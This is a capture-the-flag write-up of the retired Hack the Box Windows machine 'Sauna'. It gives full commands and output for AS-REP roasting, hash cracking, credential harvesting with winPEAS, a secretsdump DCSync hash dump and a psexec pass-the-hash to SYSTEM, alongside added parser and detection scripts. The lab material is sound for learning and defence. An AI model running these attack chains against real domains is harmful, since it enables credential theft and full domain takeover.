Hack the Box :: Sauna
Note to fellow HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Machine info
Traverxec [by egotisticalSW]
IP: 10.10.10.175
OS: Windows
Difficulty: Easy
Release: 15 Feb 2020
Retired: TBD
Recon
Nmap
As usual we kick off with an nmap scan of the box.
$ nmap -v -sV -sC -oA scans/nmap_sauna 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.083s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: "Egotistical Bank :: Home"
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-14 04:55:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/13%Time=5E94D0FD%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h02m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-14T04:57:25
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 13 22:56:35 2020 -- 1 IP address (1 host up) scanned in 301.13 seconds
OK, there are some interesting services here:
- DNS (bind)
- HTTP (IIS 10.0)
- Kerberos
- SMB
- LDAP
SMB
Let’s try to enumerate SMB shares as Guest (since we don’t have any creds, yet).
$ sudo smbmap -L -H 10.10.10.175 -u guest
[+] Finding open SMB ports....
[!] Authentication error occured
[!] SMB SessionError: STATUS_ACCOUNT_DISABLED(The referenced account is currently disabled and may not be logged on to.)
[!] Authentication error on 10.10.10.175
No luck here.
LDAP
Let’s enumerate LDAP.
$ nmap -v -sV --script ldap* -p 389 -oA scans/nmap_sauna_ldap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
| ldap-brute:
| root:<empty> => Valid credentials
| admin:<empty> => Valid credentials
| administrator:<empty> => Valid credentials
| webadmin:<empty> => Valid credentials
| sysadmin:<empty> => Valid credentials
| netadmin:<empty> => Valid credentials
| guest:<empty> => Valid credentials
| user:<empty> => Valid credentials
| web:<empty> => Valid credentials
|_ test:<empty> => Valid credentials
| ldap-rootdse:
| LDAP Results
| <ROOT>
[...]
| serverName: CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
[...]
| ldap-search:
| Context: DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: DC=EGOTISTICAL-BANK,DC=LOCAL
[...]
| name: EGOTISTICAL-BANK
[...]
| dc: EGOTISTICAL-BANK
| dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
| dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_ dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
We find the user Hugo Smith and the domain name egotistical-bank.local.
HTTP
Let’s have a look at the website as well.
There’s nothing really interesting on the site, except for the About page.

We could try to build a user list from the names on this page; perhaps one or more of them are valid usernames. Typical username formats are first.last or f.last.
$ cat findings/users.txt
fsmith
hbear
skerb
scoins
btaylor
sdriver
fergus.smith
hugo.bear
steven.kerb
shaun.coins
bowie.taylor
sophie.driver
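The list above was written by hand. The following script is an added example (not part of the original write-up) that regenerates the same candidates from the names on the About page, using the two formats the list actually contains (flast and first.last) and a few other common ones so the list can be extended consistently. The employee names are copied from the post's list; the extra format names are this example's own.

```python
"""Build candidate usernames from a list of employee names.

Added example, not from the original write-up. It reproduces the flast and
first.last candidates used in the post and offers other common formats.
"""

# Names as they appear on the "Egotistical Bank" About page (from the post).
EMPLOYEE_NAMES = [
    "Fergus Smith",
    "Hugo Bear",
    "Steven Kerb",
    "Shaun Coins",
    "Bowie Taylor",
    "Sophie Driver",
]

# Username formats as functions of (first, last); both are already lowercase.
USERNAME_FORMATS = {
    "flast": lambda f, l: f"{f[0]}{l}",        # fsmith   (used in the post)
    "first.last": lambda f, l: f"{f}.{l}",     # fergus.smith (used in the post)
    "f.last": lambda f, l: f"{f[0]}.{l}",      # f.smith
    "firstl": lambda f, l: f"{f}{l[0]}",       # ferguss
    "last.first": lambda f, l: f"{l}.{f}",     # smith.fergus
}


def split_name(full_name):
    """Return (first, last) in lowercase; middle names are ignored."""
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        raise ValueError(f"need a first and a last name: {full_name!r}")
    return parts[0], parts[-1]


def candidate_usernames(names, formats=("flast", "first.last")):
    """Expand every name into the requested formats, de-duplicated, order kept."""
    out, seen = [], set()
    for name in names:
        first, last = split_name(name)
        for fmt in formats:
            user = USERNAME_FORMATS[fmt](first, last)
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


def write_userlist(path, names, formats=("flast", "first.last")):
    """Write one candidate per line, the layout GetNPUsers.py -usersfile expects."""
    users = candidate_usernames(names, formats)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(users) + "\n")
    return len(users)


if __name__ == "__main__":
    print("\n".join(candidate_usernames(EMPLOYEE_NAMES)))
```

Pass a different `formats` tuple to try another naming convention; the order of the tuple decides the order in the output file.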
Initial foothold
Kerberos Ticket Granting Tickets (TGT)
Let’s test our list of (potential) usernames and extract TGTs to crack.
$ /opt/impacket/examples/GetNPUsers.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE]
[-format {hashcat,john}] [-usersfile USERSFILE] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
target
Queries target domain for users with 'Do not require Kerberos
preauthentication' set and export their TGTs for cracking
$ /opt/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile findings/users.txt -outputfile findings/hash.txt -dc-ip 10.10.10.175
$ cat findings/hash.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:36dff4a5bb03d0af2ac79d3e801634e3$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
Looks like we discovered the username fsmith and managed to get a TGT. Cracking this ticket, we get the password Thestrokes23.
$ hashcat -a 0 -m 18200 findings/hash.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:36dff4a5bb03d0af2ac79d3e801634e3$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:Thestrokes23
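What hashcat cracks here is the encrypted part of the AS-REP that the KDC hands out without pre-authentication. The block below is an added example (not from the write-up, impacket or hashcat): it splits a mode-18200 line into its fields so the pieces are visible, and, on the defender side, lists the accounts that would be exposed this way by checking the DONT_REQ_PREAUTH bit of userAccountControl. The user, realm and checksum in the sample line are those shown above; the ciphertext part is constructed because the post elides it, and the account records are constructed too.

```python
"""Inspect an AS-REP roast hash line and audit accounts for missing pre-auth.

Added example, not from the write-up or from impacket/hashcat.
"""
import re

# userAccountControl flag bits (documented by Microsoft)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# hashcat mode 18200 layout: $krb5asrep$<etype>$<user>@<realm>:<checksum>$<enc-part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)

# Constructed sample: real user/realm/checksum from the post, enc-part made up.
SAMPLE_HASH_LINE = (
    "$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:"
    "36dff4a5bb03d0af2ac79d3e801634e3$" + "ab" * 40
)


def parse_asrep_hash(line):
    """Split a $krb5asrep$23$ line into its components."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line in hashcat 18200 layout")
    etype = int(m["etype"])
    if etype != 23:
        # etype 17/18 (AES) hashes use a different layout; not handled here
        raise ValueError(f"only etype 23 (RC4-HMAC) is handled, got {etype}")
    return {
        "etype": etype,
        "user": m["user"],
        "realm": m["realm"],
        "checksum": m["checksum"],          # 16-byte HMAC-MD5 over the enc-part
        "edata_len": len(m["edata"]) // 2,  # encrypted enc-part length in bytes
    }


def accounts_without_preauth(records):
    """Return enabled accounts that have DONT_REQ_PREAUTH set.

    records: iterable of {"sAMAccountName": str, "userAccountControl": int},
    e.g. exported from an LDAP search of the Users container.
    """
    exposed = []
    for r in records:
        uac = r["userAccountControl"]
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            exposed.append(r["sAMAccountName"])
    return exposed


# Constructed records: 0x200 = NORMAL_ACCOUNT, 0x10000 = DONT_EXPIRE_PASSWORD
SAMPLE_RECORDS = [
    {"sAMAccountName": "fsmith", "userAccountControl": 0x410200},   # pre-auth off
    {"sAMAccountName": "hsmith", "userAccountControl": 0x010200},   # normal
    {"sAMAccountName": "oldsvc", "userAccountControl": 0x410202},   # off, but disabled
]

if __name__ == "__main__":
    print(parse_asrep_hash(SAMPLE_HASH_LINE))
    print("exposed:", accounts_without_preauth(SAMPLE_RECORDS))
```

The audit is the remediation check: any account it lists is crackable offline by anyone who can reach port 88, so the flag should be cleared unless a specific application needs it, and those accounts should carry long passwords.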
User flag
We can use these credentials to log in to the box.
$ evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents>cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
Privilege escalation
Enumerate
Let’s enumerate a bit further.
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
We find more usernames: HSmith, svc_loanmgr and (of course) Administrator.
We can also use winPEAS to collect more information. Upload the .exe to the box and run it.
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe
Info: Uploading /opt/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe to C:\Users\FSmith\Documents\winPEAS.exe
Data: 321536 bytes of 321536 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winPEAS.exe
[...]
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
[+] Home folders found(T1087&T1083&T1033)
C:\Users\Administrator
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\FSmith
C:\Users\Public
C:\Users\svc_loanmgr
[+] Looking AppCmd.exe()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials
[+] Checking for DPAPI Master Keys()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\FSmith\AppData\Roaming\Microsoft\Protect\S-1-5-21-2966785786-3096785034-1186376766-1105\ca6bc5b5-57d3-4f19-9f5a-3016d1e57c8f
Accessed: 1/24/2020 6:30:19 AM
Modified: 1/24/2020 6:30:19 AM
[+] Looking for common SAM & SYSTEM backups()
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\SYSTEM
We find a potential password for svc_loanmanager: Moneymakestheworldgoround! (the account that net user actually listed is svc_loanmgr, so the stored DefaultUserName is slightly off). AppCmd.exe was discovered as well, but none of the techniques seemed to work. There’s also a DPAPI Master Key, which we could ‘attack’ with mimikatz.
Hashdump
Let’s try the credentials we found to do a hashdump.
$ /opt/impacket/examples/secretsdump.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
usage: secretsdump.py [-h] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]
[-security SECURITY] [-sam SAM] [-ntds NTDS]
[-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]
[-use-vss] [-exec-method [{smbexec,wmiexec,mmcexec}]]
[-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]
[-pwd-last-set] [-user-status] [-history]
[-hashes LMHASH:NTHASH] [-no-pass] [-k]
[-aesKey hex key] [-dc-ip ip address]
[-target-ip ip address]
target
Performs various techniques to dump secrets from the remote machine without
executing any agent there.
$ /opt/impacket/examples/secretsdump.py EGOTISTICAL-BANK/svc_loanmgr@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:87408da437fc482b3d33f8846565ca96:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:60519d04845ef6658c94529aa8fc8220f868f0f4472f49ac8752b04d0ecaecc5
SAUNA$:aes128-cts-hmac-sha1-96:a3364c8713207d94239da98ecb4483b3
SAUNA$:des-cbc-md5:104c515b86739e08
[*] Cleaning up...
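The dump above is in pwdump layout (`account:rid:lmhash:nthash:::`), and it tells more than just the Administrator hash: HSmith and FSmith carry the same NT hash, which means the same password. The script below is an added example (not from the write-up or impacket) that parses secretsdump-style output and reports blank passwords, LM hashes still present, and accounts that share an NT hash; the sample lines are copied from the dump above, the Kerberos-key and status lines are skipped automatically.

```python
"""Review a secretsdump-style dump for weak-credential signals.

Added example, not part of the write-up or of impacket. Sample lines below are
taken from the dump in the post.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:87408da437fc482b3d33f8846565ca96:::
[*] Kerberos keys grabbed
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
"""


def parse_dump(text):
    """Return one dict per pwdump line; status and Kerberos-key lines are ignored."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line.endswith(":::"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        account, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        entries.append({
            "account": account,
            "user": account.split("\\")[-1],  # strip the DOMAIN\ prefix
            "rid": rid,
            "lm": lm,
            "nt": nt,
        })
    return entries


def review_dump(text):
    """Group the weak-credential signals found in a dump."""
    findings = {"blank_password": [], "lm_hash_present": [], "shared_nt_hash": []}
    by_nt = defaultdict(list)
    for e in parse_dump(text):
        if e["nt"] == EMPTY_NT:
            findings["blank_password"].append(e["user"])
        if e["lm"] != EMPTY_LM:
            findings["lm_hash_present"].append(e["user"])
        by_nt[e["nt"]].append(e["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"].append(sorted(users))
    return findings


if __name__ == "__main__":
    for kind, hits in review_dump(SAMPLE_DUMP).items():
        print(f"{kind}: {hits}")
```

A blank NT hash on Guest is expected as long as the account stays disabled (the SMB probe earlier returned STATUS_ACCOUNT_DISABLED); shared hashes between a person's account and a second account are the finding worth acting on, since one cracked or leaked password opens both.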
Pass-the-Hash
We find a hash for the Administrator account, which we can use in a Pass-the-Hash attack.
$ /opt/impacket/examples/psexec.py
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-target-ip ip address]
[-port [destination port]] [-service-name service name]
target [command [command ...]]
PSEXEC like functionality example using RemComSvc.
$ /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175 cmd.exe
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file KHHXRiQe.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service EnTK on 10.10.10.175.....
[*] Starting service EnTK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
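The session output shows the footprint psexec.py leaves on the target: a binary with a random 8-letter name copied into ADMIN$ and a service with a random 4-letter name that runs it. The block below is an added example (not from the write-up or impacket) of a check for that shape over System-log event 7045 (service installed) records. The events are constructed; the first mirrors what the session above would have logged, and the assumption that the image path is written as `%systemroot%\<name>.exe` for the ADMIN$ share is this example's own.

```python
"""Flag service installs that look like impacket's psexec.py.

Added example, not from the write-up or impacket. Input records carry the
fields of a Windows System-log event 7045 (constructed samples below).
"""
import re

SAMPLE_7045_EVENTS = [
    # What the session in the post would have produced (assumed path form).
    {"EventID": 7045, "ServiceName": "EnTK", "ImagePath": r"%systemroot%\KHHXRiQe.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    # Ordinary installs that must not be flagged.
    {"EventID": 7045, "ServiceName": "Sysmon64", "ImagePath": r"C:\Windows\Sysmon64.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Acme", "ImagePath": r"C:\Program Files\Acme\acmesvc.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    # Wrong event id: ignored even though the names fit.
    {"EventID": 7036, "ServiceName": "AbCd", "ImagePath": r"%systemroot%\QwErTyUi.exe"},
]

RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY_NAME = re.compile(r"^[A-Za-z]{8}\.exe$", re.IGNORECASE)
SYSTEM_ROOT_DIRS = ("%systemroot%", r"c:\windows")


def looks_like_psexec(event):
    """True when the service and binary names match psexec.py's random pattern."""
    if event.get("EventID") != 7045:
        return False
    name = event.get("ServiceName", "")
    image = event.get("ImagePath", "").strip('"')
    directory, _, binary = image.rpartition("\\")
    in_system_root = directory.lower() in SYSTEM_ROOT_DIRS
    return (bool(RANDOM_SERVICE_NAME.match(name))
            and bool(RANDOM_BINARY_NAME.match(binary))
            and in_system_root)


def find_psexec_like(events):
    """Return the service names of all suspicious 7045 events, in log order."""
    return [e["ServiceName"] for e in events if looks_like_psexec(e)]


if __name__ == "__main__":
    for name in find_psexec_like(SAMPLE_7045_EVENTS):
        print("[!] psexec-like service install:", name)
```

On its own this is a naming heuristic, so correlate a hit with the surrounding events: a 5145 share-access event for ADMIN$ writing the same binary, and a 4624 network logon (type 3) for Administrator using NTLM, which is how a pass-the-hash logon like the one above appears, since Kerberos was never involved. Requiring SMB signing, as this box already does, does not stop the attack; it only stops relaying, so the hash itself has to be protected.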
Root flag
TADA
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
f3ee04965c68257382e31502cc5e881f